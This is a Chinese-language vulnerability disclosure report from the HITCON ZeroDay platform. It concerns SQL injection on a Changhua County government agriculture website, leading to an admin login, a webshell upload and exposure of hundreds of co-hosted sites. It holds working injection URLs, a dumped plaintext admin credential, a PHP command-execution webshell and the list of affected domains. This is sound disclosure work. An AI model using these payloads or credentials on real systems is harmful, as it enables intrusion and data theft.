彰化農業文化網站 x 騏璣資訊科技 (Cheerg) Multi-Vulnerabilities 導致數百網站 RCE - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2022-00277
  •  發信 Vendor: 彰化縣政府 、 騏璣資訊科技
  • Title: 彰化農業文化網站 x 騏璣資訊科技 (Cheerg) Multi-Vulnerabilities 導致數百網站 RCE
  • Introduction: SQL injection to Upload WebShell

處理狀態

目前狀態

公開
Last Update : 2022/06/20
  • 新提交
  • 已審核
  • 已通報
  • 未回報修補狀況
  • 未複測
  • 公開

處理歷程

  • 2022/04/20 13:26:13 : 新提交 (由 Steven Meow 更新此狀態)
  • 2022/04/20 13:29:14 : 新提交 (由 Steven Meow 更新此狀態)
  • 2022/04/20 22:32:25 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2022/04/21 16:11:50 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2022/04/21 16:11:50 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2022/04/21 16:11:50 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2022/06/20 03:00:03 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2022-00277
  • 通報者:stevenyu113228 (Steven Meow)
  • 風險:嚴重
  • 類型:資料庫注入攻擊 (SQL Injection)

參考資料

攻擊者可利用該漏洞取得後端資料庫權限及完整資料(包含大量使用者個資或敏感性資料),同時也有機會對資料進行破壞或修改。

漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection

漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection

漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html

防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

www.linker.com.tw
www.linker.tw
mymind.com.tw
www.mymind.com.tw
card.mymind.com.tw
tkitchenmall.mymind.com.tw
news.linker.tw
news.linker.com.tw
store.linker.tw
store.linker.com.tw
www.twgarden.org.tw
twgarden.org.tw
card.linker.tw
card.linker.com.tw
boss.linker.tw
boss.linker.com.tw
mylife-go.linker.tw
mylife-go.linker.com.tw
mylifego.linker.tw
mylifego.linker.com.tw
e-shop.linker.tw
e-shop.linker.com.tw
eshop.linker.tw
eshop.linker.com.tw
show.linker.tw
show.linker.com.tw
facebook.linker.tw
facebook.linker.com.tw
race.linker.tw
race.linker.com.tw
service.linker.tw
service.linker.com.tw
service.cheerg.com
service.cheerg.com.tw
service.cheerg.com.cn
service.cheerg.tw
tv-he-cc.linker.tw
tv-he-cc.linker.com.tw
studyintaiwan.linker.tw
studyintaiwan.linker.com.tw
studyintaiwan.danang.linker.tw
studyintaiwan.danang.linker.com.tw
www.pai-hsin.com.tw
pai-hsin.com.tw
www.beginning.com.tw
beginning.com.tw
www.sj888.com.tw
www.aal.tw
aal.tw
www.darren168.com.tw
darren168.com.tw
tkitchenmall.linker.tw
tkitchenmall.linker.com.tw
tutor.linker.tw
tutor.linker.com.tw
ddnstationery.linker.tw
ddnstationery.linker.com.tw
star.linker.tw
star.linker.com.tw
star2013.linker.tw
star2013.linker.com.tw
kids-race.linker.tw
kids-race.linker.com.tw
www.wende-temple.org.tw
wende-temple.org.tw
1984.linker.com.tw
1984.linker.tw
cfba.tw
www.cfba.tw
chuankuei-steamer.com
www.chuankuei-steamer.com
hua-zhan.com.tw
www.hua-zhan.com.tw
chkmt.app.linker.com.tw
chkmt.app.linker.tw
www.ba.ncue.edu.tw
yuanlinfa.com.tw
www.yuanlinfa.com.tw
agec.chcg.gov.tw
www.agec.chcg.gov.tw
idipc.chcg.gov.tw
www.idipc.chcg.gov.tw
hbc99.org.tw
www.hbc99.org.tw
www.chu.org.tw
xn--qiqu8g.tw
www.xn--qiqu8g.tw
flowmotion.com.tw
xn--qiq0a.tw
www.xn--qiq0a.tw
www.flowmotion.com.tw
17663.com.tw
www.17663.com.tw
card.app.linker.com.tw
card.app.linker.tw
www.meta-min.com
pushinfa.linker.tw
www.pushinfa.linker.tw
pushinfa.linker.com.tw
www.pushinfa.linker.com.tw
www.ipm.yuntech.edu.tw
app.linker.tw
app.linker.com.tw
ptfa.org.tw
www.ptfa.org.tw
blackgold.com.tw
www.blackgold.com.tw
shenghetai.com.tw
www.shenghetai.com.tw
dream.linker.tw
dream.linker.com.tw
www.songzhutemple.org.tw
linker-apps.tw
linker-apps.com
www.linker-apps.tw
www.linker-apps.com
linker.dyndns.tv
in.linker.tw
in.mymind.com.tw
in.topmall.tw
in.trainmall.linker.tw
in.mall.linker.tw
in.greatmall.linker.tw
in.linec.linker.tw
linker-apps.com
topmall.tw
www.topmall.tw
trainmall.linker.tw
greatmall.linker.tw
www.lifestyle.tw
lifestyle.tw
s.in.linker.tw
s.in.linker.com.tw
p.in.linker.tw
p.in.linker.com.tw
inapp.linker.tw
www.stainless-faucet.com
stainless-faucet.com
tapiya.linker.tw
www.tapiya.linker.tw
management.im.ncue.edu.tw
progoods.linker.tw
ProGoodS.linker.tw
Pro.GoodS.linker.tw
mskb.linker.tw
laimage.linker.tw
ji.linker.tw
progoods.linker.com.tw
ProGoodS.linker.com.tw
Pro.GoodS.linker.com.tw
mskb.linker.com.tw
laimage.linker.com.tw
ji.linker.com.tw
abc.linker.com.tw
abc.linker.tw
ruilongtea.linker.com.tw
ruilongtea.linker.tw
water.linker.tw
water.linker.com.tw
test.linker.com.tw
test.linker.tw
go.linker.tw
go.linker.com.tw
HomeiCar.linker.tw
HomeiCar.linker.com.tw
desserts.linker.tw
desserts.linker.com.tw
hornegrace.linker.tw
hornegrace.linker.com.tw
optical.linker.tw
optical.linker.com.tw
cao.linker.tw
cao.linker.com.tw
Chambordspa.linker.tw
Chambordspa.linker.com.tw
abula.linker.tw
abula.linker.com.tw
www.atman.com.tw
dreamerworld.net
dreamerworld.tw
www.dreamerworld.net
www.dreamerworld.tw
in.go.linker.tw
in.go.linker.com.tw
zuogang.linker.tw
in-linker.dyndns.tv
c-in.dyndns.tv
www.520yes.tw
520yes.tw
www.cabmt.org.tw
cabmt.org.tw
tmp100.linker.tw
tmp101.linker.tw
tmp102.linker.tw
tmp103.linker.tw
tmp104.linker.tw
tmp105.linker.tw
tmp106.linker.tw
tmp107.linker.tw
tmp108.linker.tw
tmp109.linker.tw
pay.linker.tw
ok.linker.tw
yfcompany.linker.tw
yfcompany.linker.com.tw
swagger.linker.tw
swagger.linker.com.tw
20up.tw
www.20up.tw
goto20.tw
www.goto20.tw
20go.tw
www.20go.tw
go20.tw
www.go20.tw
wende-temple.linker.tw
wende-temple.linker.com.tw
CJ.linker.tw
missduck.linker.tw
missduck.linker.com.tw
chiaochiao.linker.tw
chiaochiao.linker.com.tw
taitaihandmade.linker.tw
taitaihandmade.linker.com.tw
sin.linker.com.tw
sin.linker.tw
coin047228370.linker.tw
coin047228370.linker.com.tw
chongde.linker.tw
kmu.school.linker.tw
kmu.maker.linker.tw
stuosh.linker.tw
hsineyi.linker.tw
tinyweb.linker.tw
0800.us
0800.linker.tw
login.linker.tw
www.topsite.cc
poetry.topsite.cc
Taishanghuang.twweb.tw
tatami.twweb.tw
lee-herb.twweb.tw
monsger.linker.tw
twst.linker.tw
twst-tools.com
www.twst-tools.com
edke.twweb.tw
decent.twweb.tw
food168.linker.tw
health.twweb.tw
orangenail.linker.tw
judia.linker.tw
dynamiclifeenergy.linker.tw
TimeJi.linker.tw
small-mili.linker.tw
dongher.com.tw
dreamerweb.linker.tw
www.anpao.com.tw
anpao.com.tw
topmall.linker.tw
mymind.linker.tw
www.goto20.tw
travel.linker.tw
money.linker.tw
xjob.tw
xjob.com.tw
forfree.tw
forfree.com.tw
jing.atman.com.tw
tops1.linker.tw
www.hsineyi.com
hsineyi.com
bykjbonsai.com
www.bykjbonsai.com
www.littlehappinessmall.com.tw
littlehappinessmall.com.tw
line.linker.tw
linetest.linker.tw
twnitc.org.tw
www.twnitc.org.tw
qr.linker.tw
mall.linker.tw
gfshop.linker.tw
fire.linker.tw
volunteer.linker.tw
www.idipc.chcg.gov.tw
idipc.chcg.gov.tw
mesona.linker.tw
linec.linker.tw
duduplan.linker.tw
jianrey.com

敘述

SQL injection

首先是 http://agec.chcg.gov.tw/front/news_detail.php 網站的 Union Based SQL injection

http://agec.chcg.gov.tw/front/news_detail.php?id=-1' UNION SELECT 1,database(),3,4,5,6,7,8,9,10 -- -

database() 就可以取得當前 database 為 s_tar

圖片

關於取 Table 的方法,由於直接輸出會噴錯誤,因此可以先轉 Hex 再輸出

http://agec.chcg.gov.tw/front/news_detail.php?id=-1' UNION SELECT 1,group_concat(hex(table_name)),3,4,5,6,7,8,9,10 from information_schema.tables where table_schema='s_tar'-- -

把輸出結果寫一個小腳本即可轉換回來

a = "5F4C6F6730353031,5F4C6F6731343038,5F4C6F6731343039,5F4C6F6731343130,5F4C6F6731343131,5F4C6F6731343132,5F4C6F6731353031,5F4C6F6731353032,5F4C6F6731353033,5F4C6F6731353034,5F4C6F6731353035,5F4C6F6731353036,5F4C6F6731353037,5F4C6F6731353038,5F4C6F6731353039,5F4C6F6731353130,5F4C6F6731353131,5F4C6F6731353132,5F4C6F6731363031,5F4C6F6731363032,5F4C6F6731363033,5F4C6F6731363034,5F4C6F6731363035,5F4C6F6731363036,5F4C6F6731363037,5F4C6F6731363038,5F4C6F6731363039,5F4C6F6731363130,5F4C6F6731363131,5F4C6F6731363132,5F4C6F6731373031,5F4C6F6731373032,5F4C6F6731373033,5F4C6F6731373034,5F4C6F6731373035,5F4C6F6731373036,5F4C6F6731373037,5F4C6F6731373038,5F4C6F6731373039,5F4C6F6731373130,5F4C6F6731373131,5F4C6F6731373132,5F4C6F6731383031,5F4C6F6731383032,5F4C6F6731383033,5F4C6F6731383034,5F4C6F6731383035,5F4C6F6731383036,5F4C6F6731383037,5F4C6F6731383038,5F4C6F6731383039,5F4C6F6731383130,5F4C6F6731383131,5F4C6F6731383132,5F4C6F6731393031,5F4C6F6731393032,5F4C6F6731393033,5F4C6F6731393034,5F4C6F6731393035,5F4C6F6731393036,5F4C"

[bytes.fromhex(i).decode() for i in a.split(",")[:-1]]

# ['_Log0501', '_Log1408', '_Log1409', '_Log1410', '_Log1411', '_Log1412', '_Log1501', '_Log1502', '_Log1503', '_Log1504', '_Log1505', '_Log1506', '_Log1507', '_Log1508', '_Log1509', '_Log1510', '_Log1511', '_Log1512', '_Log1601', '_Log1602', '_Log1603', '_Log1604', '_Log1605', '_Log1606', '_Log1607', '_Log1608', '_Log1609', '_Log1610', '_Log1611', '_Log1612', '_Log1701', '_Log1702', '_Log1703', '_Log1704', '_Log1705', '_Log1706', '_Log1707', '_Log1708', '_Log1709', '_Log1710', '_Log1711', '_Log1712', '_Log1801', '_Log1802', '_Log1803', '_Log1804', '_Log1805', '_Log1806', '_Log1807', '_Log1808', '_Log1809', '_Log1810', '_Log1811', '_Log1812', '_Log1901', '_Log1902', '_Log1903', '_Log1904', '_Log1905', '_Log1906']

由於有輸出長度限制,所以繼續 SQL injection

http://agec.chcg.gov.tw/front/news_detail.php?id=-1' UNION SELECT 1,group_concat(hex(table_name)),3,4,5,6,7,8,9,10 from information_schema.tables where table_schema='s_tar' and table_name not in ('_Log0501', '_Log1408', '_Log1409', '_Log1410', '_Log1411', '_Log1412', '_Log1501', '_Log1502', '_Log1503', '_Log1504', '_Log1505', '_Log1506', '_Log1507', '_Log1508', '_Log1509', '_Log1510', '_Log1511', '_Log1512', '_Log1601', '_Log1602', '_Log1603', '_Log1604', '_Log1605', '_Log1606', '_Log1607', '_Log1608', '_Log1609', '_Log1610', '_Log1611', '_Log1612', '_Log1701', '_Log1702', '_Log1703', '_Log1704', '_Log1705', '_Log1706', '_Log1707', '_Log1708', '_Log1709', '_Log1710', '_Log1711', '_Log1712', '_Log1801', '_Log1802', '_Log1803', '_Log1804', '_Log1805', '_Log1806', '_Log1807', '_Log1808', '_Log1809', '_Log1810', '_Log1811', '_Log1812', '_Log1901', '_Log1902', '_Log1903', '_Log1904', '_Log1905', '_Log1906') -- -

再透過腳本轉換輸出

'_Log1907', '_Log1908', '_Log1909', '_Log1910', '_Log1911', '_Log1912', '_Log2001', '_Log2002', '_Log2003', '_Log2004', '_Log2005', '_Log2006', '_Log2007', '_Log2008', '_Log2009', '_Log2010', '_Log2011', '_Log2012', '_Log2101', '_Log2102', '_Log2103', '_Log2104', '_Log2105', '_Log2106', '_Log2107', '_Log2108', '_Log2109', '_Log2110', '_Log2111', '_Log2112', '_Log2201', '_Log2202', '_Log2203', '_Log2204', '__album', '__banner', '__crop', '__crop1', '__crop2', '__downtown', '__guide', '__historyact', '__latestact', '__loginroot', '__news', '__photo', '__shop', '__traffic'

感覺重點應該會是 __loginroot 這個 Table

取 Column name

http://agec.chcg.gov.tw/front/news_detail.php?id=-1' UNION SELECT 1,group_concat(hex(column_name)),3,4,5,6,7,8,9,10 from information_schema.columns where table_name = '__loginroot' -- -

即可得知 Column 名稱

'L_id', 'L_account', 'L_passwd'

取資料

http://agec.chcg.gov.tw/front/news_detail.php?id=-1' UNION SELECT 1,group_concat(hex(CONCAT(L_account,":",L_passwd))),3,4,5,6,7,8,9,10 from __loginroot-- -

即可取得帳密 starfarm_root:1234
密碼沒有 Hash、且為弱密碼

透過 http://agec.chcg.gov.tw/admin/ 即可登入

Webshell

登入後發現伺服器內部有非常多先前駭客留下的 Webshell,代表這個 Server 已經被非常多駭客造訪過了

圖片

簡單上傳一個 Webshell 觀察

<?php system($_GET[A]); ?>

透過 uname -a 可以得知, Linux 的 kernel 版本十分老舊,可以輕易透過 Kernel Exploit 取得 root 權限。

另外發現該台 Server 綁了非常多 VHosts,因此該漏洞也可以直接影響到下列網頁伺服器

# cat /etc/httpd/conf/httpd.conf | grep ServerName 
ServerName www.linker.com.tw
ServerName www.linker.tw
ServerName mymind.com.tw
ServerName www.mymind.com.tw
ServerName card.mymind.com.tw
ServerName tkitchenmall.mymind.com.tw
ServerName news.linker.tw
ServerName news.linker.com.tw
ServerName store.linker.tw
ServerName store.linker.com.tw
ServerName www.twgarden.org.tw
ServerName twgarden.org.tw
ServerName card.linker.tw
ServerName card.linker.com.tw
ServerName boss.linker.tw
ServerName boss.linker.com.tw
ServerName mylife-go.linker.tw
ServerName mylife-go.linker.com.tw
ServerName mylifego.linker.tw
ServerName mylifego.linker.com.tw
ServerName e-shop.linker.tw
ServerName e-shop.linker.com.tw
ServerName eshop.linker.tw
ServerName eshop.linker.com.tw
ServerName show.linker.tw
ServerName show.linker.com.tw
ServerName facebook.linker.tw
ServerName facebook.linker.com.tw
ServerName race.linker.tw
ServerName race.linker.com.tw
ServerName service.linker.tw
ServerName service.linker.com.tw
ServerName service.cheerg.com
ServerName service.cheerg.com.tw
ServerName service.cheerg.com.cn
ServerName service.cheerg.tw
ServerName tv-he-cc.linker.tw
ServerName tv-he-cc.linker.com.tw
ServerName studyintaiwan.linker.tw
ServerName studyintaiwan.linker.com.tw
ServerName studyintaiwan.danang.linker.tw
ServerName studyintaiwan.danang.linker.com.tw
ServerName www.pai-hsin.com.tw
ServerName pai-hsin.com.tw
ServerName www.beginning.com.tw
ServerName beginning.com.tw
ServerName www.sj888.com.tw
ServerName www.aal.tw
ServerName aal.tw
ServerName www.darren168.com.tw
ServerName darren168.com.tw
ServerName tkitchenmall.linker.tw
ServerName tkitchenmall.linker.com.tw
ServerName tutor.linker.tw
ServerName tutor.linker.com.tw
ServerName ddnstationery.linker.tw
ServerName ddnstationery.linker.com.tw
ServerName star.linker.tw
ServerName star.linker.com.tw
ServerName star2013.linker.tw
ServerName star2013.linker.com.tw
ServerName kids-race.linker.tw
ServerName kids-race.linker.com.tw
ServerName www.wende-temple.org.tw
ServerName wende-temple.org.tw
ServerName 1984.linker.com.tw
ServerName 1984.linker.tw
ServerName cfba.tw
ServerName www.cfba.tw
ServerName chuankuei-steamer.com
ServerName www.chuankuei-steamer.com
ServerName hua-zhan.com.tw
ServerName www.hua-zhan.com.tw
ServerName chkmt.app.linker.com.tw
ServerName chkmt.app.linker.tw
ServerName www.ba.ncue.edu.tw
ServerName yuanlinfa.com.tw
ServerName www.yuanlinfa.com.tw
ServerName agec.chcg.gov.tw
ServerName www.agec.chcg.gov.tw
ServerName idipc.chcg.gov.tw
ServerName www.idipc.chcg.gov.tw
ServerName hbc99.org.tw
ServerName www.hbc99.org.tw
ServerName www.chu.org.tw
ServerName xn--qiqu8g.tw
ServerName www.xn--qiqu8g.tw
ServerName flowmotion.com.tw
ServerName xn--qiq0a.tw
ServerName www.xn--qiq0a.tw
ServerName www.flowmotion.com.tw
ServerName 17663.com.tw
ServerName www.17663.com.tw
ServerName card.app.linker.com.tw
ServerName card.app.linker.tw
ServerName www.meta-min.com
ServerName pushinfa.linker.tw
ServerName www.pushinfa.linker.tw
ServerName pushinfa.linker.com.tw
ServerName www.pushinfa.linker.com.tw
ServerName www.ipm.yuntech.edu.tw
ServerName app.linker.tw
ServerName app.linker.com.tw
ServerName ptfa.org.tw
ServerName www.ptfa.org.tw
ServerName blackgold.com.tw
ServerName www.blackgold.com.tw
ServerName shenghetai.com.tw
ServerName www.shenghetai.com.tw
ServerName dream.linker.tw
ServerName dream.linker.com.tw
ServerName www.songzhutemple.org.tw
ServerName linker-apps.tw
ServerName linker-apps.com
ServerName www.linker-apps.tw
ServerName www.linker-apps.com
ServerName linker.dyndns.tv
ServerName in.linker.tw
ServerName in.mymind.com.tw
ServerName in.topmall.tw
ServerName in.trainmall.linker.tw
ServerName in.mall.linker.tw
ServerName in.greatmall.linker.tw
ServerName in.linec.linker.tw
ServerName linker-apps.com
ServerName topmall.tw
ServerName www.topmall.tw
ServerName trainmall.linker.tw
ServerName greatmall.linker.tw
ServerName www.lifestyle.tw
ServerName lifestyle.tw
ServerName s.in.linker.tw
ServerName s.in.linker.com.tw
ServerName p.in.linker.tw
ServerName p.in.linker.com.tw
ServerName inapp.linker.tw
ServerName www.stainless-faucet.com
ServerName stainless-faucet.com
ServerName tapiya.linker.tw
ServerName www.tapiya.linker.tw
ServerName management.im.ncue.edu.tw
ServerName progoods.linker.tw
ServerName ProGoodS.linker.tw
ServerName Pro.GoodS.linker.tw
ServerName mskb.linker.tw
ServerName laimage.linker.tw
ServerName ji.linker.tw
ServerName progoods.linker.com.tw
ServerName ProGoodS.linker.com.tw
ServerName Pro.GoodS.linker.com.tw
ServerName mskb.linker.com.tw
ServerName laimage.linker.com.tw
ServerName ji.linker.com.tw
ServerName abc.linker.com.tw
ServerName abc.linker.tw
ServerName ruilongtea.linker.com.tw
ServerName ruilongtea.linker.tw
ServerName water.linker.tw
ServerName water.linker.com.tw
ServerName test.linker.com.tw
ServerName test.linker.tw
ServerName go.linker.tw
ServerName go.linker.com.tw
ServerName HomeiCar.linker.tw
ServerName HomeiCar.linker.com.tw
ServerName desserts.linker.tw
ServerName desserts.linker.com.tw
ServerName hornegrace.linker.tw
ServerName hornegrace.linker.com.tw
ServerName optical.linker.tw
ServerName optical.linker.com.tw
ServerName cao.linker.tw
ServerName cao.linker.com.tw
ServerName Chambordspa.linker.tw
ServerName Chambordspa.linker.com.tw
ServerName abula.linker.tw
ServerName abula.linker.com.tw
ServerName www.atman.com.tw
ServerName dreamerworld.net
ServerName dreamerworld.tw
ServerName www.dreamerworld.net
ServerName www.dreamerworld.tw
ServerName in.go.linker.tw
ServerName in.go.linker.com.tw
ServerName zuogang.linker.tw
ServerName in-linker.dyndns.tv
ServerName c-in.dyndns.tv
ServerName www.520yes.tw
ServerName 520yes.tw
ServerName www.cabmt.org.tw
ServerName cabmt.org.tw
ServerName tmp100.linker.tw
ServerName tmp101.linker.tw
ServerName tmp102.linker.tw
ServerName tmp103.linker.tw
ServerName tmp104.linker.tw
ServerName tmp105.linker.tw
ServerName tmp106.linker.tw
ServerName tmp107.linker.tw
ServerName tmp108.linker.tw
ServerName tmp109.linker.tw
ServerName pay.linker.tw
ServerName ok.linker.tw
ServerName yfcompany.linker.tw
ServerName yfcompany.linker.com.tw
ServerName swagger.linker.tw
ServerName swagger.linker.com.tw
ServerName 20up.tw
ServerName www.20up.tw
ServerName goto20.tw
ServerName www.goto20.tw
ServerName 20go.tw
ServerName www.20go.tw
ServerName go20.tw
ServerName www.go20.tw
ServerName wende-temple.linker.tw
ServerName wende-temple.linker.com.tw
ServerName CJ.linker.tw
ServerName missduck.linker.tw
ServerName missduck.linker.com.tw
ServerName chiaochiao.linker.tw
ServerName chiaochiao.linker.com.tw
ServerName taitaihandmade.linker.tw
ServerName taitaihandmade.linker.com.tw
ServerName sin.linker.com.tw
ServerName sin.linker.tw
ServerName coin047228370.linker.tw
ServerName coin047228370.linker.com.tw
ServerName chongde.linker.tw
ServerName kmu.school.linker.tw
ServerName kmu.maker.linker.tw
ServerName stuosh.linker.tw
ServerName hsineyi.linker.tw
ServerName tinyweb.linker.tw
ServerName 0800.us
ServerName 0800.linker.tw
ServerName login.linker.tw
ServerName www.topsite.cc
ServerName poetry.topsite.cc
ServerName Taishanghuang.twweb.tw
ServerName tatami.twweb.tw
ServerName lee-herb.twweb.tw
ServerName monsger.linker.tw
ServerName twst.linker.tw
ServerName twst-tools.com
ServerName www.twst-tools.com
ServerName edke.twweb.tw
ServerName decent.twweb.tw
ServerName food168.linker.tw
ServerName health.twweb.tw
ServerName orangenail.linker.tw
ServerName judia.linker.tw
ServerName dynamiclifeenergy.linker.tw
ServerName TimeJi.linker.tw
ServerName small-mili.linker.tw
ServerName dongher.com.tw
ServerName dreamerweb.linker.tw
ServerName www.anpao.com.tw
ServerName anpao.com.tw
ServerName topmall.linker.tw
ServerName mymind.linker.tw
ServerName www.goto20.tw
ServerName travel.linker.tw
ServerName money.linker.tw
ServerName xjob.tw
ServerName xjob.com.tw
ServerName forfree.tw
ServerName forfree.com.tw
ServerName jing.atman.com.tw
ServerName tops1.linker.tw
ServerName www.hsineyi.com
ServerName hsineyi.com
ServerName bykjbonsai.com
ServerName www.bykjbonsai.com
ServerName www.littlehappinessmall.com.tw
ServerName littlehappinessmall.com.tw
ServerName line.linker.tw
ServerName linetest.linker.tw
ServerName twnitc.org.tw
ServerName www.twnitc.org.tw
ServerName qr.linker.tw
ServerName mall.linker.tw
ServerName gfshop.linker.tw
ServerName fire.linker.tw
ServerName volunteer.linker.tw
ServerName www.idipc.chcg.gov.tw
ServerName idipc.chcg.gov.tw
ServerName mesona.linker.tw
ServerName linec.linker.tw
ServerName duduplan.linker.tw
ServerName jianrey.com

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;